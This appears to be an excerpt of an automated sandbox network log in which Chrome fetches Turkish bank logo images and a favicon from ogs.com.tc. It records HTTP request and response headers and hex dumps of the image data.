    2024-05-25 22:18:13 UTC5260INData Raw: 52 49 46 46 84 14 00 00 57 45 42 50 56 50 38 20 78 14 00 00 30 5f 00 9d 01 2a f4 01 c8 00 3e 49 24 90 45 a2 a2 21 91 79 e4 70 28 04 84 b1 b7 70 bb 55 fe 57 da fb 4a b2 b7 63 fc 8e fc b5 f9 6d a9 ff 55 fc 5d fd 2f f6 93 9d 8e b2 f2 ae f1 af cb ff d0 ff 6d fd cd ff 0d ff ff ff ff df af f3 3f db bd 86 7e 8e ff 2d ee 01 fa 67 fe 5f fa ef f8 ef f7 3f bf ff 30 1e a2 ff 73 3d 40 7f 3c fe f5 ff 87 fc 7f bb 1f f6 bf d2 df 72 1f b3 bf f0 3f c0 7c 00 7f 47 fe ed e9 6f ec 2d fb 93 ec 0d fc fb fc 2f fe 5f 5c af fc 5f ec be 0f 7f ac 7f a7 fd a4 f8 1b fe 85 fd a7 fe 7f e7 bf c8 07 ff ff 6c ce 91 7e a1 ff 76 ed 4f fb 5f da d7 65 c7 a7 7d be e5 1f d4 7e 65 7f 21 fb 4f f9 bf ef 5f b8 9f 95 ff 25 f7 b3 f1 4b fb df 50 8f c6 ff 95 7f 91 fe c1 fb 8d c2 eb 67 fd 02 3d da fa 4f
    Data Ascii: RIFFWEBPVP8 x0_*>I$E!yp(pUWJcmU]/m?~-g_?0s=@<r?|Go-/_\_l~vO_e}~e!O_%KPg=O


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    43192.168.2.549761185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:13 UTC361OUTGET /assets/images/banks/teb.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:13 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:13 GMT
    Content-Type: image/jpeg
    Content-Length: 22502
    Last-Modified: Thu, 23 May 2024 21:37:19 GMT
    Connection: close
    ETag: "664fb70f-57e6"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:13 UTC16100INData Raw: ff d8 ff e1 07 53 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 39 3a 32 37 20 31 39 3a 35 39 3a 35 38 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
    Data Ascii: SExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:09:27 19:59:58"
    2024-05-25 22:18:13 UTC6402INData Raw: dc 48 ed 8a 1c b2 b7 94 69 b9 7b 9a f0 86 c5 6a 8a ea 19 78 aa c5 1f e2 5d 2a 76 8b c4 b5 4b 6d 78 29 93 30 94 bc ab 12 39 a9 1c 8f 4a a7 b9 99 74 aa 43 41 2a c0 b0 16 42 5d 5b 46 ff 00 15 0d 15 a9 a0 3b c5 c0 90 90 55 20 6a 29 b3 0a 75 35 56 85 a8 29 2a 4e 12 95 24 90 53 84 ca 58 48 29 29 fc 24 61 20 11 28 be 28 b2 8c ae 9d 6f 66 15 0e 25 b6 d0 80 54 a5 29 6a 09 48 00 5a 49 51 01 20 5a a5 10 91 69 11 cc 34 39 9b ac 35 93 e5 25 29 ab ad 2a 22 99 b7 0a 12 a2 ca 16 a4 85 3a f9 51 08 6d 96 d0 a7 56 48 5a 5b 2d 85 29 2e 21 87 71 b4 09 00 ca 53 1a e5 33 da 7a 89 16 c5 f1 7c 5f 19 4b c0 da 9a 86 cf f7 d3 1c 9e e6 ba 34 fe d2 ba 4b 9c de fd 11 49 fc f5 30 8c c1 33 ff 00 19 67 7a 89 80 a0 7f 3e b0 75 83 71 1a 44 72 c5 0e 59 cd b5 14 1f 31 72 4c c1 b6 96 a6 dd 52
    Data Ascii: Hi{jx]*vKmx)09JtCA*B][F;U j)u5V)*N$SXH))$a ((of%T)jHZIQ Zi495%)*":QmVHZ[-).!qS3z|_K4KI03gz>uqDrY1rLR


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    44192.168.2.549764185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:13 UTC364OUTGET /assets/images/banks/isbank.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:13 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:13 GMT
    Content-Type: image/jpeg
    Content-Length: 4990
    Last-Modified: Thu, 23 May 2024 21:37:16 GMT
    Connection: close
    ETag: "664fb70c-137e"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:13 UTC4990INData Raw: 52 49 46 46 76 13 00 00 57 45 42 50 56 50 38 20 6a 13 00 00 70 60 00 9d 01 2a f4 01 c8 00 3e 49 24 90 46 22 a2 21 a1 22 96 08 f8 50 09 09 65 6e fc 7c 99 ab eb 2d 3e 87 82 4b f5 ef e6 1f ba 3f d8 7d e4 2a 0f d8 3f aa fe c6 fe d7 ee 53 b2 b8 ba 7a ad ec df e6 7f a3 ff 83 fd ad f7 93 fe ef d8 77 e6 4f fa be e0 1f a8 5f ec bf b2 fa dd 7a 8b fd c0 f5 01 fd 17 fc e7 fd cf ee 3e ec 3f dc bf 5b 3d c1 fe ad ff d9 ff 11 fe 1b e4 03 f9 f7 f7 0f fd 1e cf 1f e1 bf ff fb 8d fe e1 7b 02 7f 39 ff 2d ff d3 d9 c3 fe 6f ed 7f c1 77 f6 4f f6 3f b7 3f 03 5f b2 7f f9 fd 80 3f ff fa 80 7f ff eb 17 ea 1f f4 4e d7 bf bc 7e 52 fa 0b e4 4f c6 fe d3 f2 9e e9 7f f6 5e 4a be bd 7d db fa 7f ee 37 e5 77 de 7f db 3f d6 fe 35 f9 b7 f0 d3 50 2f c6 3f 91 7f 77 fc b4 e1 a1 00 1f 93 7f 44 ff
    Data Ascii: RIFFvWEBPVP8 jp`*>I$F"!"Pen|->K?}*?SzwO_z>?[={9-owO??_?N~RO^J}7w?5P/?wD


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    45192.168.2.549765185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:13 UTC362OUTGET /assets/images/banks/odea.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:14 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:13 GMT
    Content-Type: image/jpeg
    Content-Length: 24936
    Last-Modified: Thu, 23 May 2024 21:37:17 GMT
    Connection: close
    ETag: "664fb70d-6168"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:14 UTC16100INData Raw: ff d8 ff e1 0a 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 37 3a 33 34 3a 33 34 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
    Data Ascii: ZExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 17:34:34"
    2024-05-25 22:18:14 UTC8836INData Raw: 2a cd d2 20 6e c7 29 4a a1 4a 72 c9 59 25 a2 61 a8 3c 9c c6 d6 86 ae f2 07 32 88 5d 73 43 95 d4 bb 77 26 ae e9 54 52 3e 5d cc 80 50 af 3f 66 bb 04 9b 38 55 67 51 4f da b8 66 aa 8b 90 8d dd bb fe b2 78 d7 b3 69 78 75 a2 37 91 79 6c 45 ca d9 95 5a e6 29 36 79 2c f6 cd 5e d0 ab f2 55 b3 d8 e0 1c b2 99 61 18 fe cb 23 14 ba a2 d9 74 54 39 da 90 a2 6f 01 31 4c f6 cd 75 b3 58 6e 16 49 35 3d 59 1b 05 a6 6a 4a c1 39 20 a8 88 8f a8 f6 5a 59 cb b7 ee d4 11 11 f7 a8 a1 87 df d0 4f bf a5 5b 58 c1 09 0a a0 4d 3c ad cc b6 89 14 cf e2 24 50 24 56 64 46 62 43 01 83 b0 f9 f6 1e e1 d3 49 28 c7 8e e3 a4 63 dc a2 f1 84 83 07 0b 34 7a c9 e3 65 0a b3 77 4d 1d 37 3a 6b b6 72 dd 52 01 88 72 18 a6 21 80 04 04 04 3a cb fe 5f fc db d3 67 b6 4c ab 68 97 63 9e e1 7a be 87 2a e6 77 45
    Data Ascii: * n)JJrY%a<2]sCw&TR>]P?f8UgQOfxixu7ylEZ)6y,^Ua#tT9o1LuXnI5=YjJ9 ZYO[XM<$P$VdFbCI(c4zewM7:krRr!:_gLhcz*wE


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    46192.168.2.549766185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:14 UTC598OUTGET /assets/images/favicon-196x196.png HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:14 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:14 GMT
    Content-Type: image/png
    Content-Length: 38550
    Last-Modified: Thu, 23 May 2024 21:37:22 GMT
    Connection: close
    ETag: "664fb712-9696"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:14 UTC16101INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c4 00 00 00 c4 08 06 00 00 01 b7 a1 be fd 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 80 00 49 44 41 54 78 da e5 fd 79 78 14 c5 f6 07 8c 7f ba 67 b2 10 42 08 01 42 24 61 4d 58 05 0c 88 08 08 08 a8 08 88 0a a2 88 5c 11 54 10 dc 70 bd 82 fb 2e d7 eb c5 1d 37 40 14 14 ae 0b 2a a2 41 44 04 54 04 54 f6 7d df d7 24 93 64 32 99 bd eb fc fe e8 65 aa 7b ba 7b 7a 82 f7 fb fe de e7 ad e7 99 64 a6 bb d6 b3 d5 a9 53 a7 4e 01 00 18 63 22 00 10 91 08 2e a9 cf f9 df c6 67 56 49 57 97 d3 8a f8 67 6a 1e e3 33 cb 46 6c 7b 60
    Data Ascii: PNGIHDRgAMAa cHRMz&u0`:pQ<bKGDIDATxyxgBB$aMX\Tp.7@*ADTT}$d2e{{zdSNc".gVIWgj3Fl{`
    2024-05-25 22:18:14 UTC16384INData Raw: 0f 95 83 af 05 3b 7a 0c aa 6d 3c a5 67 0f d4 fb ef 3c 08 8a af c0 d9 b3 67 8f 9e 7f fe f9 23 cb cb cb 8f 23 b6 c9 15 35 69 df f8 df bc 7f 05 05 05 19 9a ea c5 d9 5a b4 8f 72 cd 8d e2 71 51 8a f8 cb b2 75 22 e3 fc f3 cf 6f a4 e9 eb fb f6 eb b4 ae d8 8a bc 50 d3 9c 2a 7a 0f d0 28 ac 4f 9f 3e d7 43 ef 66 62 ea 2c 60 18 0c 60 2f 8a cc be 03 00 3e fb ec b3 1e 44 14 e1 65 7d 70 e1 e7 71 9a 62 60 ee 7c 9d d9 7b f1 e2 c5 8b 10 bb b3 34 99 7b b6 ad 53 65 65 e5 67 da 04 7d e9 20 83 29 b7 90 c2 eb ff d4 3a d0 ae 5d bb fe 88 17 1b 46 db 94 36 e1 7b 3a 5f c4 5d 9f 5c a8 af 5b 99 7f 7c dc 6a b4 43 87 0e ed 61 bd 60 73 22 67 ed bc 3e b4 74 f7 dd 77 77 63 8c 9d e0 11 20 95 7b a8 a2 f7 00 dd 5c 50 de ae 8b 76 6b bb 0a 83 67 9e 79 e6 31 24 be 36 d9 91 f7 09 54 40 36 6b d6
    Data Ascii: ;zm<g<g##5iZrqQu"oP*z(O>Cfb,``/>De}pqb`|{4{Seeg} ):]F6{:_]\[|jCa`s"g>twwc {\Pvkgy1$6T@6k
    2024-05-25 22:18:14 UTC6065INData Raw: cd 16 c2 d8 b1 63 8b e7 cd 9b b7 08 b2 c9 4b 06 a8 cf 87 9a 47 9f 42 e8 9b 6f 65 9d 91 27 06 e5 40 39 00 08 39 d9 c8 7c 73 06 dc 97 f6 d5 21 e9 fb ef bf 9f 37 66 cc 98 e7 39 6b 92 91 19 78 e0 d8 01 05 00 70 f2 e4 c9 fb cf 3b ef bc d7 74 c8 f8 7c 11 6a 1e 7e 54 3b bf 9c 4c e2 2e 6f e5 1f 9a 32 05 44 11 ae 8e 1d 50 f7 a5 67 e5 9b 6a 14 09 69 a6 83 1b 67 25 cb f6 13 bc 77 92 47 63 08 89 01 a1 20 d8 a9 d3 88 ac 59 8b c8 ea 5f 11 dd b6 03 54 56 2e 5f 05 a6 8c 45 8b 99 04 fd cc 08 00 70 bb 21 b6 68 86 f4 db c6 23 75 f0 15 10 1a 35 34 8d 82 c1 18 63 e5 e5 e5 a7 67 cf 9e 3d 7b e6 cc 99 2b 4e 9c 38 51 06 fb eb 00 ec f0 6c 7c e6 c4 1a 64 cc 07 93 32 76 79 60 d1 9e f6 dc 3d 6f de bc 3b c1 31 03 00 84 16 7f 87 f0 d2 1f b5 08 0b 82 2e fa 94 c2 14 82 88 b4 f1 63 91 d2
    Data Ascii: cKGBoe'@99|s!7f9kxp;t|j~T;L.o2DPgjig%wGc Y_TV._Ep!h#u54cg={+N8Ql|d2vy`=o;1.c


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    47192.168.2.549767185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:14 UTC362OUTGET /assets/images/banks/halk.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:14 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:14 GMT
    Content-Type: image/jpeg
    Content-Length: 4904
    Last-Modified: Thu, 23 May 2024 21:37:14 GMT
    Connection: close
    ETag: "664fb70a-1328"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:14 UTC4904INData Raw: 52 49 46 46 20 13 00 00 57 45 42 50 56 50 38 20 14 13 00 00 90 61 00 9d 01 2a f4 01 c8 00 3e 49 24 90 46 22 a2 21 a1 21 f7 59 08 50 09 09 65 6e e1 75 4b e1 cf b2 7e 2e f7 c8 52 4e df fd af f6 7b fb 4f bc 5d 7f fb 9f e2 af ea 9e e7 ff ba 76 91 cb df da fe d7 3d e9 3c 4b f3 7f f2 df d3 7f bd 7e e3 fc f7 fe df fe 77 d8 af e8 0f 60 3f ea 7f cf 3a 47 f9 80 fd bf f5 36 fe e7 fa 53 ee 03 f6 0b f6 97 fc 07 c8 07 f1 ef f0 1f f8 3d a4 bf cc fb 10 7f 8b ff 59 ff ff dc 37 f9 37 f8 6f ff fe b9 7f b7 5f ff fe 50 ff b2 7f c5 fd 9e f6 a8 ff ff ec 01 ff ff d4 03 ff ff 10 f7 f3 9f c6 ef 0a 3f c2 fe 54 f6 10 f9 e7 d7 ee 4e cf 33 f5 7f f0 5f d6 3f 65 bf 2c be fd ff 21 df ff 00 bf 63 ff 83 fc b3 e1 1d 00 7f 9b 7f 3f ff 63 f9 87 e7 7d fd 7f e3 5f ba 5f 58 ff d6 fe 45 7d 00 7f
    Data Ascii: RIFF WEBPVP8 a*>I$F"!!YPenuK~.RN{O]v=<K~w`?:G6S=Y77o_P?TN3_?e,!c?c}__XE}


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    48192.168.2.549768185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:14 UTC365OUTGET /assets/images/banks/garanti.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:14 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:14 GMT
    Content-Type: image/jpeg
    Content-Length: 5268
    Last-Modified: Thu, 23 May 2024 21:37:13 GMT
    Connection: close
    ETag: "664fb709-1494"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:14 UTC5268INData Raw: 52 49 46 46 8c 14 00 00 57 45 42 50 56 50 38 20 80 14 00 00 30 63 00 9d 01 2a f4 01 c8 00 3e 49 24 90 45 a2 a2 21 91 5a 9c 8c 28 04 84 b3 b7 70 bb 00 86 6f 7e cd b9 67 d8 ff 85 f3 bd b3 bf 7e de 9b b2 7c ae 3c 7b f3 af f9 ff d0 3d a7 fa 85 f3 04 fd 4e f3 9e fd 49 f7 bf e6 03 f6 63 f6 c7 dd 33 fb ef ec e7 b9 cf 40 0f e3 1f ef 7a c7 bd 01 bc b2 bf 75 3e 16 bf b4 ff ca fd 99 f6 97 ff ff 9c b9 fe 03 b5 3f ee 1e 27 fe 2f f4 6f dd 7f 25 bf 76 fd fa 32 c7 d8 f6 a8 3f 22 fb 19 f9 1f ec df b5 bf 95 5f 7b 3f 88 ff 37 e2 4f 00 5f c4 ff 9c 7f 7e fc b3 fc a3 e3 8e 00 1f 98 7f 4e ff 3b f6 e7 e9 3b aa 0f 56 9e e0 1f cd ff ab ff b4 f5 ef fe 27 83 b5 00 ff a5 ff 65 ff b5 fe 5b dd 97 fa ef fd 5f eb 3d 07 fd 31 ff 97 fc ff c0 6f f3 6f ed 5f f2 3f bf f6 8d fd bb ff ff ee db
    Data Ascii: RIFFWEBPVP8 0c*>I$E!Z(po~g~|<{=NIc3@zu>?'/o%v2?"_{?7O_~N;;V'e[_=1oo_?


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    49192.168.2.549769185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:14 UTC364OUTGET /assets/images/banks/finans.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:14 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:14 GMT
    Content-Type: image/jpeg
    Content-Length: 6232
    Last-Modified: Thu, 23 May 2024 21:37:13 GMT
    Connection: close
    ETag: "664fb709-1858"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:14 UTC6232INData Raw: 52 49 46 46 50 18 00 00 57 45 42 50 56 50 38 20 44 18 00 00 50 69 00 9d 01 2a f4 01 c8 00 3e 49 24 8f 45 a2 a2 21 11 4c 04 c8 28 04 84 b2 b7 70 ba fd fa 6f e7 7b 4a ba df b4 f3 6d e4 9e cb fd 34 f7 ee 3c f2 90 e5 cf fa bf 76 ff 32 bf d3 7a b0 fb d4 f7 0e fd 49 f1 80 f7 8d e6 1b f6 df f6 cf dd bf fd ef ed 7f bc 1f ec be a0 9f ce bf df 75 a1 fa 08 79 6f 7e e9 fc 2f 7f 65 ff 9b fb 6b ed 39 ff ff 59 43 c8 5f d7 ff 17 7c 28 fe c5 f9 39 e8 2f 96 0f 23 7b 2f f9 35 d2 1f ab 3c cd fe 41 f5 eb ef 3f d7 bf 6a ff 33 3f 03 fd ca f8 8b c0 17 f1 5f e5 3f df 3f 2a 7f b9 7e e4 72 2a 00 4f ca 7f aa ff b7 f5 01 fa af 32 3e c7 7b 00 7f 2c fe 9d fe af ed d3 e7 5e fd 8a 01 ff 2a fe eb ff 47 fc 6f b0 df fb df ea 7f 33 bd a5 7d 3d ff 57 fc af c0 4f f2 af eb df f1 ff c0 fb 4b ff
    Data Ascii: RIFFPWEBPVP8 DPi*>I$E!L(po{Jm4<v2zIuyo~/ek9YC_|(9/#{/5<A?j3?_??*~r*O2>{,^*Go3}=WOK


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    50192.168.2.549770185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:14 UTC362OUTGET /assets/images/banks/fiba.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:14 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:14 GMT
    Content-Type: image/jpeg
    Content-Length: 36954
    Last-Modified: Thu, 23 May 2024 21:37:13 GMT
    Connection: close
    ETag: "664fb709-905a"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:14 UTC16100INData Raw: ff d8 ff e1 09 7b 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 39 3a 32 38 20 30 33 3a 33 31 3a 31 35 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
    Data Ascii: {ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:09:28 03:31:15"
    2024-05-25 22:18:15 UTC16384INData Raw: 4a 20 11 53 6b 8a 84 dd 7a 88 11 b1 ae e7 43 a7 a0 f8 c0 a3 92 4e a4 ef a0 18 40 8a 4a b9 13 21 07 1d 98 26 b8 af 97 44 0a 49 b3 e4 77 a5 ef 25 f5 69 dc c5 53 60 8f 45 a3 26 4f 12 28 0b fa 87 48 a2 73 84 d0 f1 0e 78 62 9e e4 9f a8 a7 c3 9e 30 26 13 eb 79 2c de c4 98 b6 d4 16 f3 0e da a4 1a 6e 48 ba 5c 73 e5 b9 25 d5 23 de 1c 39 3b c8 88 ff 00 36 65 6c 95 5f 4b b7 fb 82 1e 3e 7e 55 23 e6 a4 ab bd 01 92 67 09 a9 8b c6 8a f8 07 22 8d b3 72 d1 cd ce 9a 3b ae ac 0a f3 bc ad 71 24 09 ee 10 05 17 67 e2 21 10 a9 21 ac 3c 95 0e 3b 44 e7 df 36 24 8a 96 eb 1d 07 2d 53 52 2f cb cb 78 4b e9 4b 19 26 5a e2 0b 7b 39 52 f0 e9 d7 1f 57 56 e8 21 d9 ce df 8a 3f 4b 9f c1 3d 51 5f 00 70 7f e2 8d ae 40 7e bb 3a 6e ab 4a 71 f5 39 25 43 89 30 64 ac 67 e2 8a 73 4b 76 ce 4a c3 d9
    Data Ascii: J SkzCN@J!&DIw%iS`E&O(Hsxb0&y,nH\s%#9;6el_K>~U#g"r;q$g!!<;D6$-SR/xKK&Z{9RWV!?K=Q_p@~:nJq9%C0dgsKvJ
    2024-05-25 22:18:15 UTC4470INData Raw: 11 ce 73 90 6d 5e 2a e1 27 2b 06 8a aa 8c 62 bd ca ee c9 d9 3c 4e 55 f7 aa fe fd 7d ea 87 d3 36 76 2c 5e 6f 18 96 c7 94 38 d2 b4 71 e1 40 e6 d8 71 04 88 5d 05 20 fb 86 2c 0e 5e 83 14 48 8d 7a ab 05 7e 26 20 0e ad 94 81 3a b9 eb 18 b1 64 00 c7 8b 20 67 01 a0 58 42 99 0c cf 8d 32 0c e8 c6 60 26 c0 9f 06 50 9e 23 80 ad 61 42 56 39 8f 6a 39 15 3a 62 d6 68 ad a3 b5 9e 1e c1 21 fe 36 3b 91 3d cd 78 a7 36 42 2b 7e f7 74 ea 4d c4 1a 7c 45 dd d5 8e 2a fa 86 ba c2 fa aa 6b 45 5a 86 2c 09 b3 0c c8 35 b6 30 c1 32 54 b8 d0 7c a4 47 aa 31 1a ae f6 2f 7e 95 17 6f 55 9a 11 3b f6 1e 3b 23 47 4c 46 23 be 64 97 24 36 72 d7 b7 7f 7f 8f bf 48 ba 5e 45 db 5d ab bb 78 9b 2f 47 62 21 2f 7f 7a 28 20 9a 1c 75 4f f5 7b 74 c2 19 3c f2 fb 15 49 21 ce 90 5f c2 a5 32 bc 8a bf e5 e8 7d
